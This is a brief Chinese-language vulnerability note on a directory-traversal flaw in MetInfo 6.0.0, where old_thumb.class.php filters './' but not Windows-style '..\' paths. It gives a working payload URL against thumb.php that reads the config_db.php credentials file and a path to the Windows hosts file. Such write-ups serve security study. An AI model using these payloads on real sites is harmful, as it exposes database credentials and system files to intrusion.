漏洞原理

在\MetInfo6.0.0\app\system\include\module\的old_thumb.class.php文件

可以看到这里对./进行了严格的过滤，但是却忽略了在Windows下还可以用…\来跳转目录

环境搭建

下载Metinfo6.0.0

配置随便写，自己记住就行

这里前面已经审计过代码了，就直接上payload了

http://10.9.75.161/MetInfo6.0.0/include/thumb.php?dir=http\..\..\config\config_db.php

还可以访问其他文件

..\..\..\..\..\Windows\System32\drivers\etc\hosts